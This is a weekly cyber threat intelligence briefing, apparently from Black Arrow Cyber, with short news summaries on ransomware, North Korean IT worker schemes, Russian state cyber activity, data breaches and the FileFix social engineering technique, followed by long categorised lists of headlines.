An American woman has been sentenced to over eight years in prison for helping North Korean IT workers pose as US-based staff and secure jobs at over 300 companies, generating more than $17 million in illicit income. The scheme involved shipping corporate laptops abroad, forging payroll documents and using stolen identities. North Korea is believed to operate up to 4,000 such IT workers worldwide, generating as much as $600 million annually to fund state objectives. In response, the US has offered rewards of up to $15 million for information leading to the arrest of individuals involved in these activities.
UK Announces Sanctions Against Russian Cyber Units Over Threats to Europe
The UK has imposed sanctions on over 20 Russian individuals and entities linked to cyber attacks across Europe. Those named include officers from Russia’s military intelligence agency accused of targeting democratic institutions, media, energy networks and communications infrastructure. The sanctions follow broader efforts to disrupt Russian disinformation campaigns and respond to operations by groups such as NoName057(16), which has targeted political events across the EU. UK officials described these activities as part of a deliberate campaign to destabilise Europe and undermine both Ukrainian sovereignty and British security interests.
Governance, Risk and Compliance
Most cyber risks driven by few employees, study shows | SC Media
Threats
Ransomware, Extortion and Destructive Attacks
UK Confirms Ransomware Payment Ban for Public Sector and CNI - Infosecurity Magazine
Marks & Spencer’s cyber attack isn’t an exception - it’s a warning | TechRadar
Nearly Half of MSPs Have Dedicated Kitty For Ransomware Incidents - IT Security Guru
SharePoint victim count hits 400+ orgs in ongoing attacks • The Register
Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit
UK facing ‘very significant’ volume of cyber attacks, security minister warns | The Independent
UK’s Ransomware Payment Ban: Bold Strategy or Dangerous Gamble? - SecurityWeek
Retail Becomes New Target as Healthcare Ransomware Attacks Slow - Infosecurity Magazine
AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine
Ransomware gang attacking NAS devices taken down in major police operation | TechRadar
CISA and FBI warn of escalating Interlock ransomware attacks
Ransomware Group Uses AI Chatbot to Intensify Pressure on Victims - Infosecurity Magazine
Storm-2603 spotted deploying ransomware on exploited SharePoint servers - Help Net Security
Worry about the basics of ransomware, not the AI threat - Tech Monitor
BlackSuit ransomware extortion sites seized in Operation Checkmate
New Phobos and 8base ransomware decryptor recover files for free
Wartime cyber attack wiped data from two major Iranian banks, expert says | Iran International
Ransomware Victims
Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit
Marks & Spencer’s cyber attack isn’t an exception - it’s a warning | TechRadar
Retail Becomes New Target as Healthcare Ransomware Attacks Slow - Infosecurity Magazine
The password that sank a 158-year-old business - IT Security Guru
Major European healthcare network discloses security breach
Two more entities have folded after ransomware attacks – DataBreaches.Net
Russian alcohol retailer WineLab closes stores after ransomware attack
Phishing & Email Based Attacks
Phishers have found a way to downgrade—not bypass—FIDO MFA - Ars Technica
'PoisonSeed' Attacker Skates Around FIDO Keys
UK ties GRU to stealthy Microsoft 365 credential-stealing malware
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
That “credit card security” email might be a trap | Cybernews
Rise in Phishing Activity Using Spoofed SharePoint Domains With Sneaky2FA Techniques
Beware: Hackers are using fake credit card emails to steal all your passwords | Tom's Guide
Other Social Engineering
Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit
Beware: Hackers are using fake credit card emails to steal all your passwords | Tom's Guide
Accounting Firm Targeted by Malware Campaign Using New Crypter - Infosecurity Magazine
Threat Actors Leverage Zoho WorkDrive Folder to Deliver Obfuscated PureRAT Malware
Dark Web Hackers Moonlight as Travel Agents
Former #1 Movie Piracy Site "Strongly Linked" to Global Infostealer Activity * TorrentFreak
Fraud, Scams and Financial Crime
Beware: Hackers are using fake credit card emails to steal all your passwords | Tom's Guide
Researchers Found Nearly 600 Incidents of AI Fraud | Security Magazine
UK and Romania Crack Down on ATM Fraudster Network - Infosecurity Magazine
Coyote malware abuses Microsoft UIA to hunt banking creds • The Register
Fake Receipt Generators Fuel Rise in Online Fraud - Infosecurity Magazine
Return Fraud Is Rampant Thanks to Free Shipping, Customer Behavior - Business Insider
The fraud trends shaping 2025: Pressure builds on online retailers - Help Net Security
Head of AI company warns of AI fraud | The Independent
'Explosive growth' in number of Channel Island fraud complaints - Island FM
$17 Million Is Lost in ATM Scam That Spread on TikTok, Officials Say - The New York Times
Artificial Intelligence
68% of Organisations Experienced Data Leakage From Employee AI Usage | Security Magazine
AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine
Ransomware Group Uses AI Chatbot to Intensify Pressure on Victims - Infosecurity Magazine
How AI is changing the GRC strategy | CSO Online
People don't trust AI but they're increasingly using it anyway | ZDNET
Image watermarks meet their Waterloo with UnMarker • The Register
Researchers Found Nearly 600 Incidents of AI Fraud | Security Magazine
3 Ways Security Teams Can Minimize Agentic AI Chaos
How the EU Is Fighting Back Against Deepfakes - IT Security Guru
Nearly 2,000 MCP Servers Possess No Security Whatsoever
Hackers are using AI and panda images to infect Linux machines - here's how - BetaNews
Worry about the basics of ransomware, not the AI threat - Tech Monitor
WeTransfer ToS adding 'machine learning' caused freakout • The Register
2FA/MFA
Phishers have found a way to downgrade—not bypass—FIDO MFA - Ars Technica
'PoisonSeed' Attacker Skates Around FIDO Keys
Rise in Phishing Activity Using Spoofed SharePoint Domains With Sneaky2FA Techniques
Veeam Recovery Orchestrator users locked out after MFA rollout
Malware
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
UK, NATO accuse Russia's GRU over malware created to 'destablise' Europe - Breaking Defense
UK sanctions 20+ Russian hackers and agents for cyber attacks on Europe / The New Voice of Ukraine
CERT-UA Discovers LAMEHUG Malware Linked to APT28, Using LLM for Phishing Campaign
Lumma Stealer Malware Returns After Takedown Attempt - SecurityWeek
Hackers are using AI and panda images to infect Linux machines - here's how - BetaNews
Coyote malware abuses Microsoft UIA to hunt banking creds • The Register
Accounting Firm Targeted by Malware Campaign Using New Crypter - Infosecurity Magazine
Threat Actors Leverage Zoho WorkDrive Folder to Deliver Obfuscated PureRAT Malware
A Startup is Selling Data Hacked from Peoples’ Computers to Debt Collectors
NCSC: Russian malware controls emails | Cybernews
Hackers breach Toptal GitHub account, publish malicious npm packages
npm phishing attack laces popular packages with malware • The Register
Stealth backdoor found in WordPress mu-Plugins folder
Cyber criminals are Targeting US Businesses with Malicious USB Drives: By Robert Siciliano
Former #1 Movie Piracy Site "Strongly Linked" to Global Infostealer Activity * TorrentFreak
Arch Linux pulls AUR packages that installed Chaos RAT malware
Warning: Hacker Might Be Prepping This Steam Game to Spread Malware
Threat Actors Weaponizing .hwp Files to Deliver RokRAT Malware
Bots/Botnets
AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine
Mobile
Zimperium Warns of Rising Mobile Cyber Threats Amid Summer Travel Surge
Here's What Phone Thieves Do to Prevent You From Tracking Your Device
5M Public, Unsecured Wi-Fi Networks Found Exposed | Security Magazine
This attack could give criminals control of your mobile or desktop browser - PhoneArena
Surveillance Firm Bypasses SS7 Protections to Retrieve User Location - SecurityWeek
MuddyWater deploys new DCHSpy variants amid Iran-Israel conflict
China's Massistant Tool Secretly Extracts SMS, GPS Data, and Images From Confiscated Phones
Internet of Things – IoT
Your office printer could be the easiest backdoor into company networks - so update now | TechRadar
Is your Ring camera showing strange logins? Here's what's going on | ZDNET
Ring tries to explain 'May 28' bug, but users aren't buying it - Android Authority
Enterprise printer security fails at every stage - Help Net Security
Update your printer! Over 700 models actively being attacked by hackers | PCWorld
When Your Power Meter Becomes a Tool of Mass Surveillance | Electronic Frontier Foundation
Data Breaches/Leaks
Startup takes personal data stolen by malware and sells it on to other companies | Malwarebytes
Most data breaches have unknown causes as transparency continues to fall - Help Net Security
A Startup is Selling Data Hacked from Peoples’ Computers to Debt Collectors
68% of Organisations Experienced Data Leakage From Employee AI Usage | Security Magazine
Holyrood | No evidence of data loss in Glasgow City Council cyber-attack, experts say
Inquiry after SAS identities leaked in new breach
Regulator Claims 9,000+ Clients' Data Hit Dark Web in Security Breach
Risika Data Breach Exposes 100M Swedish Records to Fraud Risks
France: New Data Breach Could Affect 340,000 Jobseekers - Infosecurity Magazine
People are getting over $4,000 from the T-Mobile data breach settlement
Dior begins sending data breach notifications to US customers
Dell scoffs at breach, says miscreants stole ‘fake data' • The Register
750,000 Impacted by Data Breach at The Alcohol & Drug Testing Service - SecurityWeek
Marketing, Law Firms Say Data Breaches Impact Over 200,000 People - SecurityWeek
Data breach feared after cyber attack on AMEOS hospitals in Germany – DataBreaches.Net
Major German media group falls victim to hacker attack – DW – 07/22/2025
1.4 Million Affected by Data Breach at Virginia Radiology Practice - SecurityWeek
Organised Crime & Criminal Actors
Dark Web Hackers Moonlight as Travel Agents
Europol Sting Leaves Russian 'NoName057(16)' Group Fractured
Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cyber Crime Marketplace
Cryptocurrency/Cryptomining/Cryptojacking/NFTs/Blockchain
AI-Generated Lcryx Ransomware Discovered in Cryptomining Botnet - Infosecurity Magazine
New Wave of Crypto-Hijacking Infects 3,500+ Websites
3,500 Websites Hijacked to Secretly Mine Crypto Using Stealth JavaScript and WebSocket Tactics
Insider Risk and Insider Threats
Most cyber risks driven by few employees, study shows | SC Media
Supply Chain and Third Parties
Hackers fooled Cognizant help desk, says Clorox in $380M cyber attack lawsuit
Firmware Vulnerabilities Continue to Plague Supply Chain
Clorox accuses IT provider in lawsuit of giving hackers employee passwords - CNA
Sean Plankey vows to boot China from US supply chain, advocate for CISA budget
Cloud/SaaS
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
UK Sanctions 3 Russian Military Cyber Units - InfoRiskToday
UK blames Russia’s infamous ‘Fancy Bear’ group for Microsoft cloud hacks | CSO Online
Outages
Phone networks down: EE, BT, Three, and Vodafone all not working in mass outage | The Independent
Alaska’s system-wide ground stop ‘not a cyber security event’ | News | Flight Global
Has the media industry learned from the Crowdstrike outage? - TVBEurope
Encryption
UK May Backtrack on Controversial Demand for Backdoor to Encrypted Apple User Data - MacRumors
Linux and Open Source
Hackers are using AI and panda images to infect Linux machines - here's how - BetaNews
How unvalidated code is putting UK national security at risk - Tech Monitor
Digital sovereignty becomes a matter of resilience for Europe - Help Net Security
Arch Linux pulls AUR packages that installed Chaos RAT malware
Passwords, Credential Stuffing & Brute Force Attacks
158-Year-Old UK Logistics Firm KNP Collapses After Ransomware Attack Exploits Weak Password
UK ties GRU to stealthy Microsoft 365 credential-stealing malware
The password that sank a 158-year-old business - IT Security Guru
Hard-Coded Credentials Found in HPE Instant On Devices Allow Admin Access
New QR Code Attack Via PDFs Evades Detection Systems and Harvest Credentials
Clorox accuses IT provider in lawsuit of giving hackers employee passwords - CNA
Hackers scanning for TeleMessage Signal clone flaw exposing passwords
Regulations, Fines and Legislation
UK Confirms Ransomware Payment Ban for Public Sector and CNI - Infosecurity Magazine
UK facing ‘very significant’ volume of cyber attacks, security minister warns | The Independent
UK’s Ransomware Payment Ban: Bold Strategy or Dangerous Gamble? - SecurityWeek
Monzo’s £21m fine highlights banks’ cyber security failures | Computer Weekly
Six months into DORA, most financial firms are still not ready - Help Net Security
UK May Backtrack on Controversial Demand for Backdoor to Encrypted Apple User Data - MacRumors
ENISA Turns to Experts to Steer EU Cyber Regulations
Over 80% solar inverters Chinese-made, India moves to shield power grid from cyber risks
UK Sanctions 3 Russian Military Cyber Units - InfoRiskToday
Sean Plankey vows to boot China from US supply chain, advocate for CISA budget
Government responds to feedback on ransomware consultation | Practical Law
After website hack, Arizona election officials unload on Trump’s CISA | CyberScoop
Models, Frameworks and Standards
Six months into DORA, most financial firms are still not ready - Help Net Security
Careers, Working in Cyber and Information Security
AI is here, but you still need juniors, say cyber security pros | Cybernews
How to Advance from SOC Manager to CISO?
How to Build a Cyber Security Team to Maximize Business Impact
How to land your first job in cyber security - Help Net Security
Law Enforcement Action and Take Downs
Lumma Stealer Malware Returns After Takedown Attempt - SecurityWeek
Europol targets Kremlin-backed cyber crime gang NoName057(16)
Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cyber Crime Marketplace
UK and Romania Crack Down on ATM Fraudster Network - Infosecurity Magazine
Ransomware gang attacking NAS devices taken down in major police operation | TechRadar
Operator of Jetflicks illegal streaming service gets 7 years in prison
Nation State Actors, Advanced Persistent Threats (APTs), Cyber Warfare, Cyber Espionage and Geopolitical Threats/Activity
Cyber Warfare and Cyber Espionage
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
NATO Condemns Russian Malicious Cyber Activities – Statement – Eurasia Review
UK sanctions 20+ Russian hackers and agents for cyber attacks on Europe / The New Voice of Ukraine
NATO countries to employ full range of capabilities to counter cyber threats from Russia – Rutte
Russian sabotage attacks surged across Europe in 2024
Russian trawlers threaten vital undersea cables in Atlantic
Europe cyber attacks surge amid geopolitical tensions | Cybernews
UK sanctions Russian cyber spies accused of facilitating murders – DataBreaches.Net
UK uncovers novel Microsoft snooping malware, blames GRU • The Register
NCSC: Russian malware controls emails | Cybernews
Why it's time for the US to go on offense in cyber space | CyberScoop
Recovery IS strength: The test of American cyber power | SC Media
China-Backed APT41 Attack Surfaces in Africa
China-Linked Hackers Launch Targeted Espionage Campaign on African IT Infrastructure
Opinion | To fight cyberwar, the US must establish a tech academy - The Washington Post
Nation State Actors
Europe cyber attacks surge amid geopolitical tensions | Cybernews
How Can Companies Guard Against Rising Nation-State Cyber Threats? | Phelps Dunbar - JDSupra
China
3 China Nation-State Actors Target SharePoint Bugs
Over 80% solar inverters Chinese-made, India moves to shield power grid from cyber risks
Sean Plankey vows to boot China from US supply chain, advocate for CISA budget
China-Backed APT41 Attack Surfaces in Africa
China-Linked Hackers Launch Targeted Espionage Campaign on African IT Infrastructure
China's Massistant Tool Secretly Extracts SMS, GPS Data, and Images From Confiscated Phones
Singapore warns China-linked group UNC3886 targets its critical infrastructure
China warns of backdoored devices, on land and under the sea • The Register
Russia
NATO Condemns Russian Malicious Cyber Activities – Statement – Eurasia Review
UK sanctions 20+ Russian hackers and agents for cyber attacks on Europe / The New Voice of Ukraine
NATO countries to employ full range of capabilities to counter cyber threats from Russia – Rutte
British institutions to be banned from paying ransoms to Russian hackers – POLITICO
UK, NATO accuse Russia's GRU over malware created to 'destablise' Europe - Breaking Defense
Russia Linked to New Malware Targeting Email Accounts for Espionage - Infosecurity Magazine
Russian sabotage attacks surged across Europe in 2024
Russian trawlers threaten vital undersea cables in Atlantic
Europol Sting Leaves Russian 'NoName057(16)' Group Fractured
UK Sanctions 3 Russian Military Cyber Units - InfoRiskToday
UK ties GRU to stealthy Microsoft 365 credential-stealing malware
CERT-UA Discovers LAMEHUG Malware Linked to APT28, Using LLM for Phishing Campaign
UK sanctions Russian cyber spies accused of facilitating murders – DataBreaches.Net
Europol Arrests XSS Forum Admin in Kyiv After 12-Year Run Operating Cyber Crime Marketplace
Operation CargoTalon Attacking Russian Aerospace & Defence to Deploy EAGLET Implant
Russian alcohol retailer WineLab closes stores after ransomware attack
Iran
MuddyWater deploys new DCHSpy variants amid Iran-Israel conflict
Iran-Linked DCHSpy Android Malware Masquerades as VPN Apps to Spy on Dissidents
Iranian Hackers Deploy New Android Spyware Version - Infosecurity Magazine
Will An Iran Cyber Attack Panic Usher In A New Patriot Act? – OpEd – Eurasia Review
Ex-IDF cyber chief talks Iran, Scattered Spider with The Reg • The Register
Wartime cyber attack wiped data from two major Iranian banks, expert says | Iran International
North Korea
Europe cyber attacks surge amid geopolitical tensions | Cybernews
Other Nation State Actors, Hacktivism, Extremism, Terrorism and Other Geopolitical Threat Intelligence
From Missiles to Malware: India-Pakistan Cyber Rivalry and Lessons for Taiwan – Taiwan Insight
Tools and Controls
Ransomware gang attacking NAS devices taken down in major police operation | TechRadar
AI is here, but you still need juniors, say cyber security pros | Cybernews
As AI tools take hold in cyber security, entry-level jobs could shrink - Help Net Security
Firmware Vulnerabilities Continue to Plague Supply Chain
Your office printer could be the easiest backdoor into company networks - so update now | TechRadar
Enterprise printer security fails at every stage - Help Net Security
Update your printer! Over 700 models actively being attacked by hackers | PCWorld
Majority of CISOs Lack Full Visibility Over APIs - IT Security Guru
How to harden your Active Directory against Kerberoasting
What Makes Great Threat Intelligence?
How to Use Threat Intelligence to Enhance Cyber Security Operations
DNS security is important but is DNSSEC a failed experiment? • The Register
Veeam Recovery Orchestrator users locked out after MFA rollout
3 Ways Security Teams Can Minimize Agentic AI Chaos
Reclaiming Control: How Enterprises Can Fix Broken Security Operations - SecurityWeek
Your app is under attack every 3 minutes - Help Net Security
China's Massistant Tool Secretly Extracts SMS, GPS Data, and Images From Confiscated Phones
Other News
What To Know About Dangerous Airport And Airline Cyber Attacks, And Why They're On The Rise
Retail Becomes New Target as Healthcare Ransomware Attacks Slow - Infosecurity Magazine
Summer habits could increase cyber risk to enterprise data - Data Centre & Network News
From beaches to breaches: Summer work habits put enterprise data at risk - Digital Journal
NATO warns ports vulnerable to 'unprecedented' cyber threats - FreightWaves
Meta and Google are laying a fast-growing web of mega subsea cables
Ports are getting smarter and more hackable - Help Net Security
Coast Guard Issues Cyber Rule for Maritime Transport Safety
World Health Organisation CISO on securing global health emergencies - Help Net Security
Loaf and order: Belgian police launch bread-based cyber security campaign • Graham Cluley
Basic cyber security lapses are leaving US infrastructure exposed, top experts warn - Nextgov/FCW
How did Stuxnet impact cyber operations? The US House aims to find out | SC Media
Vulnerability Management
Microsoft Put Older Versions of SharePoint on Life Support. Hackers Are Taking Advantage | WIRED
Update your printer! Over 700 models actively being attacked by hackers | PCWorld
How quickly do we patch? A quick look from the global viewpoint - SANS Internet Storm Center
VMware portal prevents some users from downloading patches • The Register
Vulnerabilities
Microsoft Put Older Versions of SharePoint on Life Support. Hackers Are Taking Advantage | WIRED
SharePoint victim count hits 400+ orgs in ongoing attacks • The Register
Microsoft says some SharePoint hackers now using ransomware | Reuters
CitrixBleed 2: 100 Organisations Hacked, Thousands of Instances Still Vulnerable - SecurityWeek
Microsoft fixes two SharePoint zero-days under attack, but it's not over - how to patch | ZDNET
Cisco confirms active exploitation of ISE and ISE-PIC flaws
Hardcoded credentials found in HPE Aruba Instant On Wi-Fi devices
Critical Vulnerabilities Patched in Sophos Firewall - SecurityWeek
SonicWall Patches Critical SMA 100 Vulnerability, Warns of Recent Malware Attack - SecurityWeek
Rise in Phishing Activity Using Spoofed SharePoint Domains With Sneaky2FA Techniques
Microsoft mistakenly tags Windows Firewall error log bug as fixed
New 7-Zip Vulnerability Enables Malicious RAR5 File to Crash Your System
Another massive security snafu hits Microsoft • The Register
High-Severity Flaws Patched in Chrome, Firefox - SecurityWeek
Critical Mitel Flaw Lets Hackers Bypass Login, Gain Full Access to MiVoice MX-ONE Systems
Critical NVIDIA Container Toolkit Flaw Allows Privilege Escalation on AI Cloud Services
Hackers Exploit Critical CrushFTP Flaw to Gain Admin Access on Unpatched Servers
VMware portal prevents some users from downloading patches • The Register
CISA Warns: SysAid Flaws Under Active Attack Enable Remote File Access and SSRF
Sector Specific
Industry specific threat intelligence reports are available.
Contact us to receive tailored reports specific to the industry/sector and geographies you operate in.
· Automotive
· Construction
· Critical National Infrastructure (CNI)
· Defence & Space
· Education & Academia
· Energy & Utilities
· Estate Agencies
· Financial Services
· FinTech
· Food & Agriculture
· Gaming & Gambling
· Government & Public Sector (including Law Enforcement)
· Health/Medical/Pharma
· Hotels & Hospitality
· Insurance
· Legal
· Manufacturing
· Maritime & Shipping
· Oil, Gas & Mining
· OT, ICS, IIoT, SCADA & Cyber-Physical Systems
· Retail & eCommerce
· Small and Medium Sized Businesses (SMBs)
· Startups
· Telecoms
· Third Sector & Charities
· Transport & Aviation
· Web3
Links to articles are for interest and awareness and linking to or reposting external content does not endorse any service or product, likewise we are not responsible for the security of external links.
Black Arrow Cyber Threat Intelligence Briefing 18 July 2025
Black Arrow Cyber Threat Intelligence Briefing 18 July 2025:
-Most Cyber Security Risk Comes from Just 10% of Employees
-Stop Settling for Check-the-Box Cyber Security Policies
-A New, Silent Social Engineering Attack Is Being Used by Hackers; Your Security Systems Might Not Notice Until It’s Too Late
-Firms Have a Fake North Korean IT Worker Problem – Here’s How to Stop It
-Orgs and Individuals Clinging to Windows 10 Face Heightened Risk, Says NCSC
-Supplier Risk Is Breaking the Size Myth in Cyber
-Most European Financial Firms Still Lagging on DORA Compliance
-AI Cloaking Tools Enable Harder-to-Detect Cyber Attacks
-Ransomware Surges 63% in Q2
-All 6.5m Co-Op Members Had Data Stolen in Recent Cyber Attack, Retailer Admits
-North Korean Hackers Blamed for Record Spike in Crypto Thefts in 2025
-Russia Shifts Cyber War Focus from US to UK Following Trump’s Election
-Europol Disrupts Major Network of Russian-Speaking Cyber Criminals Targeting Ukraine and Its Allies
Welcome to this week’s Black Arrow Cyber Threat Intelligence Briefing – a weekly digest, collated and curated by our cyber experts to provide senior and middle management with an easy to digest round up of the most notable threats, vulnerabilities, and cyber related news from the last week.
Executive Summary
In our briefing this week, and continuing our opening theme from last week, we share research insights that just 10% of employees account for nearly three quarters of all risky behaviour in the workplace, and the need to have cyber security policies that reflect the realities of the workplace and create a security culture. We also report on a new social engineering tactic that encourages employees to run malicious code for the attacker. Other employee risks continue to evolve, including the insider risk of recruiting North Korean IT workers who access sensitive data and extort the employer.
We highlight actions that organisations should focus on now: these include upgrading to Windows 11; managing the risks in their supply chain; and for those organisations in scope, progressing their compliance for DORA. We also highlight the evolving risk of AI cloaking tools, and the surge in ransomware. The consequences of attacks are emphasised by the breach of 6.5m customer records at the UK retailer Co-Op, and a record spike in crypto thefts by North Koreans. Finally, we include news of Russian state and citizen attackers focusing on the UK and Ukraine-aligned countries.
Top Cyber Stories of the Last Week
Most Cyber Security Risk Comes from Just 10% of Employees
A new study by Living Security and the Cyentia Institute has found that just 10% of employees account for nearly three quarters of all risky behaviour in the workplace, challenging assumptions about who poses the greatest cyber risk. Surprisingly, remote and part-time staff are generally less risky than their in-office, full-time colleagues. The report argues for focused action plans and controls for those employees who present the greatest risk.
https://www.helpnetsecurity.com/2025/07/16/human-cybersecurity-risk-employees/
Stop Settling for Check-the-Box Cyber Security Policies
Many organisations still rely on outdated or overly rigid cyber security policies that fail to reflect how work is actually done. This mismatch often drives employees to find workarounds, weakening overall defences. Complex password rules, poorly implemented multi-factor authentication, and generic training programmes are common pitfalls. A recent study found that 65% of office workers admit to bypassing policies, with 70% of IT leaders reporting unauthorised AI use. Effective cyber security requires policies that are practical, tailored to roles, and regularly updated based on real-world feedback, helping foster a security culture rather than just ticking compliance boxes.
https://www.helpnetsecurity.com/2025/07/15/stop-settling-for-check-the-box-cybersecurity-policies/
A New, Silent Social Engineering Attack Is Being Used by Hackers; Your Security Systems Might Not Notice Until It’s Too Late
Researchers have warned of a new social engineering tactic called FileFix, which exploits common user behaviour to silently trigger malicious commands. By encouraging users to paste a copied link into Windows File Explorer, attackers can run hidden code without raising security alerts. Although current tests involve harmless code, threat actors are already using the method in real-world scenarios, indicating likely progression to malware delivery. The technique does not rely on software flaws but manipulates user trust. Organisations are urged to enhance user awareness and review incident response plans to address this fast-evolving threat.
Firms Have a Fake North Korean IT Worker Problem – Here’s How to Stop It
A growing number of organisations are being targeted by fraudulent job applicants, many linked to North Korea, who use fake identities, deepfake videos, and AI-generated responses to secure remote IT roles. These individuals have successfully infiltrated major firms, sometimes gaining access to sensitive data and extorting employers. Some companies have reported hundreds of suspicious applications in just weeks. Key warning signs include impressive CVs with minimal LinkedIn presence, reluctance to attend in-person meetings, and inconsistencies in personal details. Without stronger collaboration between HR, legal, and cyber security teams, businesses remain vulnerable to these evolving and well-resourced threats.
https://www.theregister.com/2025/07/13/fake_it_worker_problem/
Orgs and Individuals Clinging to Windows 10 Face Heightened Risk, Says NCSC
The UK’s NCSC has warned that continued reliance on Windows 10 places organisations and individuals at increasing risk as the system nears end-of-life in October 2025. After this date, Microsoft will no longer provide security updates or support, making unpatched systems prime targets for cyber attacks. Despite being over a decade old, Windows 10 remains widely used, but the NCSC urges a move to Windows 11, which offers stronger built-in protections by default. Organisations delaying the upgrade risk undermining their cyber resilience and may fall short of basic security standards, such as those required under the UK’s Cyber Essentials certification.
Supplier Risk Is Breaking the Size Myth in Cyber
Organisations of all sizes face growing risk from cyber attacks targeting their suppliers, with over half of recent incidents linked to third parties. The number of globally disruptive cyber attacks has nearly doubled since 2020, and nearly half of affected businesses report revenue loss. Smaller firms are not shielded by size, and larger ones cannot rely on internal measures alone. Increasing use of artificial intelligence and global tensions are widening the threat landscape. Businesses are urged to map their supplier dependencies, assess third-party risks, and ensure continuity plans account for supplier failure.
Most European Financial Firms Still Lagging on DORA Compliance
Six months after DORA came into force, most European financial services firms still fall short of compliance, with 96% admitting their current data resilience measures are insufficient. Key challenges include oversight of third-party risks, increased pressure on IT teams, and rising costs from technology providers. One in five firms has yet to secure budget for implementation. Despite this, 94% now rank DORA as a higher organisational priority, with many integrating it into broader resilience plans. Regulators can impose significant fines for non-compliance, highlighting the urgency for firms to accelerate their cyber resilience efforts.
https://www.infosecurity-magazine.com/news/european-financial-dora-compliance/
AI Cloaking Tools Enable Harder-to-Detect Cyber Attacks
Threat actors are now using AI-powered cloaking tools to hide phishing and malware sites from detection, making cyber attacks harder to identify. Services like Hoax Tech and JS Click Cloaker offer cloaking-as-a-service, using machine learning and behavioural profiling to show scam content to real users while misleading security scanners. These tools assess hundreds of data points in real time and can personalise content to increase success. Experts warn this marks a serious shift in the threat landscape, urging organisations to adopt behaviour-based detection, multi-layered defences and adaptive technologies to stay ahead of these evolving threats.
https://www.infosecurity-magazine.com/news/ai-cloaking-tools-enable-complex/
Ransomware Surges 63% in Q2
Ransomware attacks surged by 63% in the second quarter of 2025, reaching a record 276 publicly disclosed incidents according to BlackFog. Each month in the quarter broke previous records, with June alone seeing a 113% year-on-year increase. Healthcare was the most targeted sector, followed by government and services, while retail also saw its highest ever Q2 attack levels, particularly in the UK. The Qilin ransomware group led activity, responsible for 10% of incidents. Over 80% of ransomware attacks remain undisclosed, with BlackFog estimating more than 1,400 hidden cases this quarter. The report reinforces the urgent need for stronger data protection measures.
https://betanews.com/2025/07/16/ransomware-surges-63-percent-in-q2/
All 6.5m Co-Op Members Had Data Stolen in Recent Cyber Attack, Retailer Admits
The UK retailer Co-op has confirmed that all 6.5 million of its members had their personal data stolen during a cyber attack earlier this year. The breach, which led to the shutdown of parts of its IT systems in April, allowed attackers to access names, addresses and contact details. The organisation's CEO described the impact on members and staff as devastating. This incident highlights the ongoing risk to large member-based organisations and the need for strong cyber security controls to protect personal data and maintain trust in the face of growing threats.
North Korean Hackers Blamed for Record Spike in Crypto Thefts in 2025
A surge in cryptocurrency thefts has seen over $2 billion stolen in the first half of 2025 alone, already exceeding losses for the whole of last year. A major breach at crypto exchange Bybit, reportedly carried out by North Korean hackers, accounted for $1.4 billion of this amount. The stolen funds are believed to be supporting North Korea’s nuclear programme and helping evade international sanctions. Analysts warn this reflects a broader strategy by North Korea, which includes using remote IT workers to infiltrate Western firms, steal intellectual property, and extort payments under threat of data leaks.
Russia Shifts Cyber War Focus from US to UK Following Trump’s Election
UK intelligence agencies have warned of a marked increase in Russian state-backed cyber attacks targeting British infrastructure since the start of 2025. This shift appears to be a deliberate move away from US targets following Donald Trump’s election, as the Kremlin aims to avoid provoking the new administration. The UK is now seen as Russia’s primary adversary, with threats focusing on disruption and chaos, particularly against critical infrastructure such as energy and healthcare. Officials have noted a surge in hybrid operations combining technology, misinformation and proxies, with some attacks traced to highly capable hacker groups operating under Russian direction.
Europol Disrupts Major Network of Russian-Speaking Cyber Criminals Targeting Ukraine and Its Allies
Europol has led a major international operation disrupting the cyber criminal group NoName057(16), known for targeting Ukraine and NATO countries with denial-of-service attacks. Coordinated across 12 nations, the effort dismantled a network of over 100 servers and resulted in arrests, searches, and legal action against key individuals. The group, with over 4,000 supporters, used gamified tactics and cryptocurrency rewards to encourage participation. Authorities say the attacks were ideologically driven and aimed at countries supporting Ukraine. This highlights the growing threat of politically motivated cyber attacks and the scale of coordination required to counter them.
Governance, Risk and Compliance
Most cyber security risk comes from just 10% of employees - Help Net Security
Compliance is evolving — Is your resilience ready? | TechRadar
True cyber resilience comes from culture | BFI
Factoring Cyber Security Into Finance's Digital Strategy
Turning Cyber Risk Into Boardroom Metrics That Matter
How to Calculate Cyber Security ROI for CEOs and Boards | TechTarget
Stop settling for check-the-box cyber security policies - Help Net Security
Threats
Ransomware, Extortion and Destructive Attacks
Ransomware surges 63 percent in Q2 - BetaNews
Newly Emerged GLOBAL GROUP RaaS Expands Operations with AI-Driven Negotiation Tools
Nearly one-third of Irish firms paid a cyber ransom in last year
Wiper Malware: The Threat to Businesses | SC Media UK
French and UK Authorities Arrest Suspects in Ransomware Cases
Interlock ransomware adopts FileFix method to deliver malware
Interlock Ransomware Unleashes New RAT in Widespread Campaign - Infosecurity Magazine
Police disrupt “Diskstation” ransomware gang attacking NAS devices
Anatomy of a Scattered Spider attack: A growing ransomware threat evolves | CSO Online
Retail Ransomware Attacks Jump 58% Globally in Q2 2025 - Infosecurity Magazine
Ryuk ransomware operator extradited to US, faces five years in federal prison | CyberScoop
Microsoft Exposes Scattered Spider’s Latest Tactics - Infosecurity Magazine
Report: Global retail ransomware intrusions surge | SC Media
Iranian-Backed Pay2Key Ransomware Resurfaces with 80% Profit Share for Cyber Criminals
Ransomware Victims
Report: Global retail ransomware intrusions surge | SC Media
Four people bailed after arrests over cyber attacks on M&S, Harrods and Co-op - TheIndustry.fashion
Some Glasgow City Council online services still down | Glasgow Times
M&S resumes online recruitment following cyber attack - Retail Gazette
United Natural Foods Expects $400M revenue impact from June cyber attack
Phishing & Email Based Attacks
Microsoft Teams phishing spreads updated Matanbuchus malware loader | SC Media
13 Romanians Arrested for Phishing the UK’s Tax Service - SecurityWeek
Hackers Can Hide Malicious Code in Gemini's Email Summaries
Beware! Research shows Gmail's AI email summaries can be hacked - Android Authority
